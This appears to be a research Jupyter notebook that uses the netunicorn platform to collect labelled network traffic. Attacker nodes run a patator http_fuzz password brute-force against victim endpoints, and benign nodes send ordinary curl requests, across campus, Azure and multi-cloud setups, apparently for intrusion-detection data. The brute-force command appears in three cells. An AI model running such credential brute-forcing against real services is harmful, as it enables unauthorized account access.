# Experiment 0.1.

## Collecting training data from Campus infrastructure

In [1]:
import sys
sys.version

'3.9.0 (default, Nov 15 2020, 14:28:56) \n[GCC 7.3.0]'

In [2]:
%load_ext dotenv
%dotenv

In [3]:
import os

from netunicorn.base import MinionPool, Task
from netunicorn.base.experiment import Experiment, ExperimentStatus
from netunicorn.base.pipeline import Pipeline
from netunicorn.library.basic import ShellCommand
from netunicorn.library.upload.webdav import UploadToWebDav
from netunicorn.client.remote import RemoteClient

In [4]:
class BenignTask(Task):
    def __init__(self, url1, url2):
        self.url1 = url1
        self.url2 = url2
    
    def run(self):
        import subprocess
        for i in range(500):
            subprocess.check_output(f'curl {self.url1}', shell=True)
            subprocess.check_output(f'curl {self.url2}', shell=True)
        return 0

In [5]:
attacker_pipeline = (
    Pipeline()
    .then(ShellCommand(
        "python ./patator.py http_fuzz "
        f"url={os.environ['VICTIM_ENDPOINT']} "
        "persistent=1 user_pass=FILE0:FILE0 0=/opt/patator/passwords.txt -x ignore:code=401"
    ))
)
attacker_pipeline.environment_definition.image = "redacted"

In [6]:
benign_pipeline = Pipeline().then(BenignTask(
    "redacted",
    "redacted",
))
benign_pipeline.environment_definition.image = "redacted"

In [7]:
client = RemoteClient(
    endpoint=os.environ['UNICORN_ENDPOINT'],
    login=os.environ['UNICORN_LOGIN'],
    password=os.environ['UNICORN_PASSWORD']
)

In [8]:
minion_pool = client.get_minion_pool()

In [9]:
attacker_pool = MinionPool([x for x in minion_pool if x.name in {
    'raspi-e4:5f:01:56:d9:a3',
    'raspi-e4:5f:01:75:6b:2c',
    'raspi-e4:5f:01:72:a2:eb',
    'raspi-e4:5f:01:56:d8:fc',
}])
benign_pool = MinionPool([x for x in minion_pool if x.name in {
    'raspi-dc:a6:32:d7:6e:64',
    'raspi-e4:5f:01:56:d9:73',
    'raspi-e4:5f:01:56:d9:8b'
}])

In [10]:
assert len(attacker_pool) == 4
assert len(benign_pool) == 3

In [11]:
experiment = Experiment().map(attacker_pool, attacker_pipeline).map(benign_pool, benign_pipeline)

In [12]:
experiment_label = 'patator-0.1.5'

In [13]:
client.prepare_experiment(experiment, experiment_label)

'patator-0.1.5'

In [14]:
client.start_execution(experiment_label)

'patator-0.1.5'

## Collecting testing data from Azure infrastructure

In [16]:
attacker_pipeline = (
    Pipeline()
    .then(ShellCommand(
        "python ./patator.py http_fuzz "
        f"url={os.environ['AZURE_VICTIM_ENDPOINT']} "
        "persistent=1 user_pass=FILE0:FILE0 0=/opt/patator/passwords.txt -x ignore:code=401"
    ))
)
attacker_pipeline.environment_definition.image = "redacted"

benign_pipeline = Pipeline().then(BenignTask(
    "http://172.174.8.19/about.html",
    "http://172.174.8.19:26511/health",
))
benign_pipeline.environment_definition.image = "redacted"

In [17]:
experiment = Experiment().map(attacker_pool, attacker_pipeline).map(benign_pool, benign_pipeline)

In [18]:
experiment_label = 'patator-external-0.1.1'

In [19]:
client.prepare_experiment(experiment, experiment_label)

'patator-external-0.1.1'

In [20]:
client.start_execution(experiment_label)

'patator-external-0.1.1'

## Collecting testing data from multi-cloud dataset

In [18]:
minion_pool

[netunicorn-search-aws-1, netunicorn-search-aws-2, raspi-e4:5f:01:56:d9:a3, raspi-e4:5f:01:75:6b:2c, raspi-e4:5f:01:56:d6:ce, raspi-dc:a6:32:d7:6e:64, raspi-e4:5f:01:56:d9:3d, raspi-e4:5f:01:75:71:17, raspi-e4:5f:01:56:d9:0a, raspi-e4:5f:01:56:d9:3a, raspi-e4:5f:01:75:6b:35, raspi-e4:5f:01:72:a2:eb, raspi-e4:5f:01:56:d8:cd, raspi-e4:5f:01:56:d5:2b, raspi-e4:5f:01:75:6e:53, raspi-e4:5f:01:56:d9:73, raspi-e4:5f:01:75:54:04, raspi-e4:5f:01:56:d9:8b, raspi-e4:5f:01:72:89:99, raspi-e4:5f:01:79:4a:18, raspi-e4:5f:01:56:d9:a2, raspi-e4:5f:01:56:d8:fc, netunicorn-search-aws-3, netunicorn-search-digitalocean-2, netunicorn-search-digitalocean-1]

In [19]:
attacker_pool = MinionPool([x for x in minion_pool if x.name in {
    'netunicorn-search-aws-1',
    'netunicorn-search-digitalocean-1',
}])
benign_pool = MinionPool([x for x in minion_pool if x.name in {
    'netunicorn-search-aws-2',
    'netunicorn-search-aws-3',
    'netunicorn-search-digitalocean-2',
}])

In [20]:
print(attacker_pool)
print(benign_pool)

[netunicorn-search-aws-1, netunicorn-search-digitalocean-1]
[netunicorn-search-aws-2, netunicorn-search-aws-3, netunicorn-search-digitalocean-2]


In [21]:
attacker_pipeline = (
    Pipeline()
    .then(ShellCommand(
        "python ./patator.py http_fuzz "
        f"url={os.environ['AZURE_VICTIM_ENDPOINT']} "
        "persistent=1 user_pass=FILE0:FILE0 0=/opt/patator/passwords.txt -x ignore:code=401"
    ))
)
attacker_pipeline.environment_definition.image = "redacted"

benign_pipeline = Pipeline().then(BenignTask(
    "http://172.174.8.19/about.html",
    "http://172.174.8.19:26511/health",
))
benign_pipeline.environment_definition.image = "redacted"

In [22]:
experiment_label = 'patator-multicloud-0.1.2'

In [23]:
experiment = Experiment().map(attacker_pool, attacker_pipeline).map(benign_pool, benign_pipeline)

In [24]:
client.prepare_experiment(experiment, experiment_label)

'patator-multicloud-0.1.2'

In [25]:
client.start_execution(experiment_label)

'patator-multicloud-0.1.2'